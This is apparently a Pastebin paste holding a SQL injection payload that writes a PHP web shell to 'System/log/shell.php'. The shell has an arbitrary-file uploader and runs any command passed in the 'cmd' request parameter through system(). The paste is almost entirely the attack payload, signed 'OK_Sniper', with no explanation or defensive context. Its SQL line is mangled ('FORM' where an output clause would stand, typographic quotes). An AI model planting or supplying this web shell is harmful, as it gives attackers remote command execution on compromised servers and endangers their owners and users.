Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SELECT ‘<?php
- $files = @$_FILES[“files”];
- if ($files[“name”] != ”) {
- $fullpath = $_REQUEST[“path”] . $files[“name”];
- if (move_uploaded_file($files[‘tmp_name’], $fullpath)) {
- echo “<h1><a href=’$fullpath’>OK-Click here!</a></h1>”;
- }
- }echo ‘<html><head><title>Upload files…</title></head><body><form method=POST enctype=”multipart/form-data” action=””><input type=text name=path><input type=”file” name=”files”><input type=submit value=”Up”></form></body></html>’;
- ?><?php $cmd = <<<EOD
- cmd
- EOD;
- if(isset($_REQUEST[$cmd])) {
- system($_REQUEST[$cmd]); } ?>’
- FORM ‘OK_Sniper’
- Advertisements
- System/log/shell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement